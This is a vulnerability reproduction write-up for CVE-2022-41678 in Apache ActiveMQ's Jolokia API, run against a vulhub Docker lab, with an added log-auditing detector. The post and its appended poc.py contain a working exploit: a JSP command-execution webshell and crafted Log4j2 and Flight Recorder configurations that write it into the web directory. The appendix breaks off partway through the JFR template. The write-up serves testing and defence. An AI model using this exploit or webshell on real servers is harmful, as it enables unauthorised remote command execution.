[Vulnerability Reproduction] CVE-2022-41678 Arbitrary JMX Service Invocation with Web Interface

embedded/2024/12/29 2:48:23/

Vulnerability Information

NVD - cve-2022-41678

Apache ActiveMQ prior to 5.16.5, 5.17.3: there is an authenticated RCE in the Jolokia /api/jolokia.

Component          Affected versions    Fixed versions
Apache:ActiveMQ    < 5.16.6             >= 5.16.6
Apache:ActiveMQ    5.17.0 - 5.17.4      >= 5.17.4, >= 6.0.0, >= 5.18.0

Once a user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. In detail, in ActiveMQ configurations, Jetty allows org.jolokia.http.AgentServlet to handle requests to /api/jolokia. org.jolokia.http.HttpRequestHandler#handlePostRequest is able to create a JmxRequest through JSONObject and calls org.jolokia.http.HttpRequestHandler#executeRequest. Deeper in the call stack, org.jolokia.handler.ExecHandler#doHandleRequest can be invoked through reflection. This could lead to RCE via various MBeans. One example is unrestricted deserialization in jdk.management.jfr.FlightRecorderMXBeanImpl, which exists on Java versions above 11:

  1. Call newRecording.
  2. Call setConfiguration, with webshell data hidden in it.
  3. Call startRecording.
  4. Call copyTo. The webshell will be written to a .jsp file.

The mitigation is to restrict (by default) the actions authorized on Jolokia, or disable Jolokia. A more restrictive Jolokia configuration has been defined in the default ActiveMQ distribution. We encourage users to upgrade to ActiveMQ distribution versions including the updated Jolokia configuration: 5.16.6, 5.17.4, 5.18.0, 6.0.0.

Jolokia is a JMX-over-HTTP bridge that allows JMX MBeans to be operated through HTTP requests.

The core of the vulnerability is the FlightRecorder MBean, a feature provided in JDK 11 and above for recording memory, garbage collection, call-stack and similar information. An attacker can use the following methods:

  • newRecording - create a new recording session
  • setConfiguration - change the configuration of a recording session
  • startRecording - start recording
  • stopRecording - stop recording
  • copyTo - export the recorded data to a file

The attacker first modifies the configuration through setConfiguration, changing some key names to JSP code, so that the recorded data contains the injected JSP code. The attacker then uses copyTo to export the recording containing the malicious code into ActiveMQ's web directory, achieving remote code execution on the server.

Background

Apache ActiveMQ is an open source messaging middleware developed by the Apache Software Foundation that supports Java messaging services, clustering, the Spring framework, and more.

Homepage: https://github.com/vulhub/vulhub/tree/master/activemq

Source: https://github.com/apache/activemq

Environment Setup

docker-compose.yaml

version: '2'
services:
  activemq:
    image: vulhub/activemq:5.17.3
    ports:
      - "61616:61616"
      - "8161:8161"
      - "5005:5005"

Start the container:

$ docker-compose up -d

61616 is the broker port on which messages are delivered; 8161 is the port of the web admin console.

Visit http://127.0.0.1:8161/admin/ to see the web admin page (the username and password are both admin).

Vulnerability Reproduction

Reference: https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2022-41678

First, the /api/jolokia/list API lists all MBeans on the server; two of them can be used in this reproduction:


The first method uses org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean, an MBean provided by Log4j2. With its setConfigText operation an attacker can change the Log4j configuration and thereby have the log file written into an arbitrary directory.

poc.py is in the appendix; use it to reproduce the full process:

python3 poc.py -u admin -p admin http://127.0.0.1:8161


This method is limited by the ActiveMQ version, however, because Log4j2 was only introduced into Apache ActiveMQ in 5.17.0.

The webshell is written to /admin/shell.jsp; visit http://127.0.0.1:8161/admin/shell.jsp?cmd=id and change the cmd parameter to execute commands:


The second exploitable MBean is jdk.management.jfr.FlightRecorderMXBean.

FlightRecorder is a feature introduced in OpenJDK 11 for recording Java virtual machine runtime events. Using it, an attacker can write the event log to an arbitrary file.

poc.py is in the appendix; use it to reproduce the full process (the --exploit parameter selects the method):

python3 poc.py -u admin -p admin --exploit jfr http://127.0.0.1:8161


The webshell is written to /admin/shelljfr.jsp:


Remediation

activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt
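As an added example (not from the original post or the vulhub PoC), the following Python models the advisory's mitigation, restricting Jolokia to read-only request types and denying exec calls on the two MBeans discussed above, and runs that policy as a detector over constructed request-log lines shaped like the POST bodies poc.py sends, including a check for the newRecording, setConfiguration, startRecording, copyTo chain. The policy, log format and client addresses are assumptions for illustration, not ActiveMQ's shipped Jolokia access configuration.

```python
# Added example, not from the original post or the vulhub PoC: a defender-side
# model of the advisory's mitigation ("restrict the actions authorized on
# Jolokia") applied to Jolokia request bodies of the shape the PoC sends, plus
# a check for the newRecording -> setConfiguration -> startRecording -> copyTo
# chain. The policy, log format and addresses are assumptions for illustration.
import json
from typing import Optional

# Jolokia request types that only read state; "exec" invokes an MBean operation.
READ_ONLY_TYPES = {"read", "list", "version", "search"}

# (MBean domain, operation) pairs the post shows being used to write files.
# "*" matches any operation of that domain.
DENIED_EXEC = {
    ("jdk.management.jfr", "*"),                     # FlightRecorderMXBean
    ("org.apache.logging.log4j2", "setConfigText"),  # LoggerContextAdminMBean
}

# Order of FlightRecorder operations from the advisory; stopRecording may occur
# in between, so a subsequence match is used rather than an exact match.
JFR_CHAIN = ["newRecording", "setConfiguration", "startRecording", "copyTo"]


def mbean_domain(mbean: str) -> str:
    """'jdk.management.jfr:type=FlightRecorder' -> 'jdk.management.jfr'."""
    return mbean.split(":", 1)[0]


def evaluate(req: dict) -> tuple:
    """Return (allowed, reason) for one decoded Jolokia request object."""
    rtype = req.get("type", "")
    if rtype in READ_ONLY_TYPES:
        return True, f"{rtype} is read-only"
    if rtype != "exec":
        return False, f"request type {rtype!r} not in allow list"
    domain = mbean_domain(req.get("mbean", ""))
    op = req.get("operation", "")
    for denied_domain, denied_op in DENIED_EXEC:
        if denied_domain == domain and denied_op in ("*", op):
            return False, f"exec {op} on {domain} denied"
    return True, f"exec {op} on {domain} permitted"


def parse_line(line: str) -> Optional[dict]:
    """Constructed log format: '<client> <method> <path> <json-body>'."""
    parts = line.split(" ", 3)
    if len(parts) != 4 or not parts[2].startswith("/api/jolokia"):
        return None
    try:
        body = json.loads(parts[3])
    except json.JSONDecodeError:
        return None
    if not isinstance(body, dict):
        return None
    return {"client": parts[0], "method": parts[1], "path": parts[2], "body": body}


def contains_chain(ops: list, chain: list) -> bool:
    """True if every step of chain appears in ops, in order (subsequence)."""
    remaining = iter(ops)
    return all(any(op == step for op in remaining) for step in chain)


def audit(log: str) -> dict:
    """Apply the policy to each line and look for the FlightRecorder chain."""
    denied = []
    jfr_ops = {}  # client -> ordered list of FlightRecorder exec operations
    for line in log.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        client, req = rec["client"], rec["body"]
        allowed, reason = evaluate(req)
        if not allowed:
            denied.append((client, reason))
        if req.get("type") == "exec" and mbean_domain(req.get("mbean", "")) == "jdk.management.jfr":
            jfr_ops.setdefault(client, []).append(req.get("operation", ""))
    chain_clients = sorted(c for c, ops in jfr_ops.items() if contains_chain(ops, JFR_CHAIN))
    return {"denied": denied, "jfr_chain_clients": chain_clients}


# Constructed sample: one client replaying the PoC's FlightRecorder sequence,
# one replaying the Log4j2 path, one doing ordinary broker monitoring.
SAMPLE_LOG = """\
10.0.0.5 POST /api/jolokia/ {"type":"list"}
10.0.0.5 POST /api/jolokia/ {"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"newRecording","arguments":[]}
10.0.0.5 POST /api/jolokia/ {"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"setConfiguration","arguments":[1,"<configuration>...</configuration>"]}
10.0.0.5 POST /api/jolokia/ {"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"startRecording","arguments":[1]}
10.0.0.5 POST /api/jolokia/ {"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"stopRecording","arguments":[1]}
10.0.0.5 POST /api/jolokia/ {"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"copyTo","arguments":[1,"webapps/admin/shelljfr.jsp"]}
10.0.0.7 POST /api/jolokia/ {"type":"exec","mbean":"org.apache.logging.log4j2:type=CTX","operation":"setConfigText","arguments":["<Configuration>...</Configuration>","utf-8"]}
10.0.0.9 POST /api/jolokia/ {"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","attribute":"TotalMessageCount"}
10.0.0.9 POST /api/jolokia/ {"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","operation":"gc","arguments":[]}
"""

if __name__ == "__main__":
    result = audit(SAMPLE_LOG)
    for client, reason in result["denied"]:
        print(f"DENY {client}: {reason}")
    print("FlightRecorder chain seen from:", result["jfr_chain_clients"])
```

Note that the Log4j2 path carries the JSP payload in a later User-Agent header rather than in the Jolokia body, so the exec call to setConfigText is the point to alert on for that variant.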

Appendix

poc.py

#!/usr/bin/env python3
import sys
import logging
import requests
import argparse
import time
from urllib.parse import urljoin
from html import escape

logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

webshell = ('<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); '
            'out.println(org.apache.commons.io.IOUtils.toString(p.getInputStream(), "utf-8")); %>')
original_template = r'''<?xml version="1.0" encoding="UTF-8"?>
<Configuration><Appenders><Console name="Console" target="SYSTEM_OUT"><PatternLayout pattern="%5p | %m%n"/></Console><RollingRandomAccessFile name="RollingFile" fileName="${sys:activemq.data}/activemq.log" filePattern="${sys:activemq.data}/activemq.log.%i"><PatternLayout pattern="%d | %-5p | %m | %c | %t%n%throwable{full}"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile><RollingRandomAccessFile name="AuditLog" fileName="${sys:activemq.data}/audit.log" filePattern="${sys:activemq.data}/audit.log.%i"><PatternLayout pattern="%-5p | %m | %t%n"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile></Appenders><Loggers><Root level="INFO"><AppenderRef ref="Console"/><AppenderRef ref="RollingFile"/></Root><Logger name="org.apache.activemq.spring" level="WARN"/><Logger name="org.apache.activemq.web.handler" level="WARN"/><Logger name="org.springframework" level="WARN"/><Logger name="org.apache.xbean" level="WARN"/><Logger name="org.eclipse.jetty" level="WARN"/><Logger name="org.apache.activemq.audit" level="INFO" additivity="false"><AppenderRef ref="AuditLog"/></Logger><!-- Uncomment and modify as needed for ActiveMQ logger<Logger name="org.apache.activemq" level="DEBUG"/>--></Loggers>
</Configuration>
'''
evil_template = r'''<?xml version="1.0" encoding="UTF-8"?>
<Configuration><Appenders><Console name="Console" target="SYSTEM_OUT"><PatternLayout pattern="%5p | %m%n"/></Console><RollingRandomAccessFile name="RollingFile" fileName="${sys:activemq.data}/../webapps/admin/shell.jsp" filePattern="${sys:activemq.data}/../webapps/admin/shell.jsp.%i"><PatternLayout pattern="%d | %-5p | %m | %c | %t%n%throwable{full}"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile><RollingRandomAccessFile name="AuditLog" fileName="${sys:activemq.data}/audit.log" filePattern="${sys:activemq.data}/audit.log.%i"><PatternLayout pattern="%-5p | %m | %t%n"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile></Appenders><Loggers><Root level="INFO"><AppenderRef ref="Console"/><AppenderRef ref="RollingFile"/></Root><Logger name="org.apache.activemq.spring" level="WARN"/><Logger name="org.apache.activemq.web.handler" level="WARN"/><Logger name="org.springframework" level="WARN"/><Logger name="org.apache.xbean" level="WARN"/><Logger name="org.eclipse.jetty" level="DEBUG"/><Logger name="org.apache.activemq.audit" level="INFO" additivity="false"><AppenderRef ref="AuditLog"/></Logger><!-- Uncomment and modify as needed for ActiveMQ logger<Logger name="org.apache.activemq" level="DEBUG"/>--></Loggers>
</Configuration>
'''
record_template = r'''<?xml version="1.0" encoding="UTF-8"?><!--Recommended way to edit .jfc files is to use Java Mission Control,see Window -> Flight Recorder Template Manager.
--><configuration version="2.0" label="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle"><event name="jdk.ThreadAllocationStatistics"><setting name="enabled">true</setting><setting name="period"><![CDATA[||| '''+webshell+r''' |||]]></setting></event><event name="jdk.ClassLoadingStatistics"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ClassLoaderStatistics"><setting name="enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.JavaThreadStatistics"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ThreadStart"><setting name="enabled">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ThreadEnd"><setting name="enabled">true</setting></event><event name="jdk.ThreadSleep"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.ThreadPark"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.JavaMonitorEnter"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.JavaMonitorWait"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.JavaMonitorInflate"><setting name="enabled">false</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.BiasedLockRevocation"><setting 
name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.BiasedLockSelfRevocation"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.BiasedLockClassRevocation"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ReservedStackActivation"><setting name="enabled">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ClassLoad"><setting name="enabled" control="class-loading-enabled">false</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ClassDefine"><setting name="enabled" control="class-loading-enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.ClassUnload"><setting name="enabled" control="class-loading-enabled">false</setting></event><event name="jdk.JVMInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.InitialSystemProperty"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.ExecutionSample"><setting name="enabled" control="method-sampling-enabled">true</setting><setting name="period" control="method-sampling-java-interval">20 ms</setting></event><event name="jdk.NativeMethodSample"><setting name="enabled" control="method-sampling-enabled">true</setting><setting name="period" control="method-sampling-native-interval">20 ms</setting></event><event name="jdk.SafepointBegin"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointStateSynchronization"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointWaitBlocked"><setting 
name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointCleanup"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointCleanupTask"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointEnd"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.ExecuteVMOperation"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.Shutdown"><setting name="enabled">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ThreadDump"><setting name="enabled" control="thread-dump-enabled">true</setting><setting name="period" control="thread-dump-interval">everyChunk</setting></event><event name="jdk.IntFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.UnsignedIntFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.LongFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.UnsignedLongFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.DoubleFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.BooleanFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.StringFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.IntFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.UnsignedIntFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.LongFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.UnsignedLongFlagChanged"><setting 
name="enabled">true</setting></event><event name="jdk.DoubleFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.BooleanFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.StringFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.ObjectCount"><setting name="enabled" control="memory-profiling-enabled-all">false</setting><setting name="period">everyChunk</setting></event><event name="jdk.GCConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.GCHeapConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.YoungGenerationConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.GCTLABConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.GCSurvivorConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.ObjectCountAfterGC"><setting name="enabled">false</setting></event><event name="jdk.GCHeapSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.PSHeapSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1HeapSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.MetaspaceSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.MetaspaceGCThreshold"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.MetaspaceAllocationFailure"><setting name="enabled" control="gc-enabled-normal">true</setting><setting 
name="stackTrace">true</setting></event><event name="jdk.MetaspaceOOM"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.MetaspaceChunkFreeListSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.GarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ParallelOldGarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.YoungGarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.OldGarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.G1GarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePause"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel1"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel2"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel3"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel4"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhaseConcurrent"><setting name="enabled" control="gc-enabled-all">true</setting><setting name="threshold">0 ms</setting></event><event 
name="jdk.GCReferenceStatistics"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.PromotionFailed"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.EvacuationFailed"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.EvacuationInformation"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1MMU"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1EvacuationYoungStatistics"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1EvacuationOldStatistics"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1BasicIHOP"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1AdaptiveIHOP"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.PromoteObjectInNewPLAB"><setting name="enabled" control="memory-profiling-enabled-medium">false</setting></event><event name="jdk.PromoteObjectOutsidePLAB"><setting name="enabled" control="memory-profiling-enabled-medium">false</setting></event><event name="jdk.ConcurrentModeFailure"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.AllocationRequiringGC"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.TenuringDistribution"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1HeapRegionInformation"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="period">everyChunk</setting></event><event name="jdk.G1HeapRegionTypeChange"><setting name="enabled" control="gc-enabled-all">false</setting></event><event name="jdk.ShenandoahHeapRegionInformation"><setting name="enabled" 
control="gc-enabled-all">false</setting><setting name="period">everyChunk</setting></event><event name="jdk.ShenandoahHeapRegionStateChange"><setting name="enabled" control="gc-enabled-all">false</setting></event><event name="jdk.OldObjectSample"><setting name="enabled" control="memory-leak-detection-enabled">true</setting><setting name="stackTrace" control="memory-leak-detection-stack-trace">false</setting><setting name="cutoff" control="memory-leak-detection-cutoff">0 ns</setting></event><event name="jdk.CompilerConfiguration"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CompilerStatistics"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.Compilation"><setting name="enabled" control="compiler-enabled">true</setting><setting name="threshold" control="compiler-compilation-threshold">1000 ms</setting></event><event name="jdk.CompilerPhase"><setting name="enabled" control="compiler-enabled">true</setting><setting name="threshold" control="compiler-phase-threshold">60 s</setting></event><event name="jdk.CompilationFailure"><setting name="enabled" control="compiler-enabled-failure">false</setting></event><event name="jdk.CompilerInlining"><setting name="enabled" control="compiler-enabled-failure">false</setting></event><event name="jdk.CodeSweeperConfiguration"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CodeSweeperStatistics"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.SweepCodeCache"><setting name="enabled" control="compiler-enabled">true</setting><setting name="threshold" control="compiler-sweeper-threshold">100 ms</setting></event><event name="jdk.CodeCacheConfiguration"><setting name="enabled" 
control="compiler-enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CodeCacheStatistics"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.CodeCacheFull"><setting name="enabled" control="compiler-enabled">true</setting></event><event name="jdk.OSInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.VirtualizationInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CPUInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.ThreadContextSwitchRate"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">10 s</setting></event><event name="jdk.CPULoad"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ThreadCPULoad"><setting name="enabled">true</setting><setting name="period">10 s</setting></event><event name="jdk.CPUTimeStampCounter"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.SystemProcess"><setting name="enabled">true</setting><setting name="period">endChunk</setting></event><event name="jdk.NetworkUtilization"><setting name="enabled">true</setting><setting name="period">5 s</setting></event><event name="jdk.InitialEnvironmentVariable"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.PhysicalMemory"><setting name="enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.ObjectAllocationInNewTLAB"><setting name="enabled" control="memory-profiling-enabled-medium">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.ObjectAllocationOutsideTLAB"><setting name="enabled" 
control="memory-profiling-enabled-medium">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.NativeLibrary"><setting name="enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.ModuleRequire"><setting name="enabled">true</setting><setting name="period">endChunk</setting></event><event name="jdk.ModuleExport"><setting name="enabled">true</setting><setting name="period">endChunk</setting></event><event name="jdk.FileForce"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="file-io-threshold">20 ms</setting></event><event name="jdk.FileRead"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="file-io-threshold">20 ms</setting></event><event name="jdk.FileWrite"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="file-io-threshold">20 ms</setting></event><event name="jdk.SocketRead"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="socket-io-threshold">20 ms</setting></event><event name="jdk.SocketWrite"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="socket-io-threshold">20 ms</setting></event><event name="jdk.SecurityPropertyModification"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.TLSHandshake"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.X509Validation"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.X509Certificate"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.JavaExceptionThrow"><setting name="enabled" control="enable-exceptions">false</setting><setting 
name="stackTrace">true</setting></event><event name="jdk.JavaErrorThrow"><setting name="enabled" control="enable-errors">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ExceptionStatistics"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ActiveRecording"><setting name="enabled">true</setting></event><event name="jdk.ActiveSetting"><setting name="enabled">true</setting></event><event name="jdk.DataLoss"><setting name="enabled">true</setting></event><event name="jdk.DumpReason"><setting name="enabled">true</setting></event><event name="jdk.ZPageAllocation"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.ZThreadPhase"><setting name="enabled">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ZStatisticsCounter"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.ZStatisticsSampler"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><!--Contents of the control element is not read by the JVM, it's usedby Java Mission Control to change settings that carry the control attribute.--><control><selection name="gc-level" default="detailed" label="Garbage Collector"><option label="Off" name="off">off</option><option label="Normal" name="detailed">normal</option><option label="All" name="all">all</option></selection><condition name="gc-enabled-normal" true="true" false="false"><or><test name="gc-level" operator="equal" value="normal"/><test name="gc-level" operator="equal" value="all"/></or></condition><condition name="gc-enabled-all" true="true" false="false"><test name="gc-level" operator="equal" value="all"/></condition><selection name="memory-profiling" default="off" label="Memory Profiling"><option label="Off" name="off">off</option><option label="Object Allocation and Promotion" name="medium">medium</option><option 
label="All, including Heap Statistics (May cause long full GCs)" name="all">all</option></selection><condition name="memory-profiling-enabled-medium" true="true" false="false"><or><test name="memory-profiling" operator="equal" value="medium"/><test name="memory-profiling" operator="equal" value="all"/></or></condition><condition name="memory-profiling-enabled-all" true="true" false="false"><test name="memory-profiling" operator="equal" value="all"/></condition><selection name="compiler-level" default="normal" label="Compiler"><option label="Off" name="off">off</option><option label="Normal" name="normal">normal</option><option label="Detailed" name="detailed">detailed</option><option label="All" name="all">all</option></selection><condition name="compiler-enabled" true="false" false="true"><test name="compiler-level" operator="equal" value="off"/></condition><condition name="compiler-enabled-failure" true="true" false="false"><or><test name="compiler-level" operator="equal" value="detailed"/><test name="compiler-level" operator="equal" value="all"/></or></condition><condition name="compiler-sweeper-threshold" true="0 ms" false="100 ms"><test name="compiler-level" operator="equal" value="all"/></condition><condition name="compiler-compilation-threshold" true="1000 ms"><test name="compiler-level" operator="equal" value="normal"/></condition><condition name="compiler-compilation-threshold" true="100 ms"><test name="compiler-level" operator="equal" value="detailed"/></condition><condition name="compiler-compilation-threshold" true="0 ms"><test name="compiler-level" operator="equal" value="all"/></condition><condition name="compiler-phase-threshold" true="60 s"><test name="compiler-level" operator="equal" value="normal"/></condition><condition name="compiler-phase-threshold" true="10 s"><test name="compiler-level" operator="equal" value="detailed"/></condition><condition name="compiler-phase-threshold" true="0 s"><test name="compiler-level" operator="equal" 
value="all"/></condition><selection name="method-sampling-interval" default="normal" label="Method Sampling"><option label="Off" name="off">off</option><option label="Normal" name="normal">normal</option><option label="High" name="high">high</option><option label="Ludicrous (High Overhead)" name="ludicrous">ludicrous</option></selection><condition name="method-sampling-java-interval" true="999 d"><test name="method-sampling-interval" operator="equal" value="off"/></condition><condition name="method-sampling-java-interval" true="20 ms"><test name="method-sampling-interval" operator="equal" value="normal"/></condition><condition name="method-sampling-java-interval" true="10 ms"><test name="method-sampling-interval" operator="equal" value="high"/></condition><condition name="method-sampling-java-interval" true="1 ms"><test name="method-sampling-interval" operator="equal" value="ludicrous"/></condition><condition name="method-sampling-native-interval" true="999 d"><test name="method-sampling-interval" operator="equal" value="off"/></condition><condition name="method-sampling-native-interval" true="20 ms"><or><test name="method-sampling-interval" operator="equal" value="normal"/><test name="method-sampling-interval" operator="equal" value="high"/><test name="method-sampling-interval" operator="equal" value="ludicrous"/></or></condition>  <condition name="method-sampling-enabled" true="false" false="true"><test name="method-sampling-interval" operator="equal" value="off"/></condition><selection name="thread-dump-interval" default="normal" label="Thread Dump"><option label="Off" name="off">999 d</option><option label="At least Once" name="normal">everyChunk</option><option label="Every 60 s" name="everyMinute">60 s</option><option label="Every 10 s" name="everyTenSecond">10 s</option><option label="Every 1 s" name="everySecond">1 s</option></selection><condition name="thread-dump-enabled" true="false" false="true"><test name="thread-dump-interval" operator="equal" 
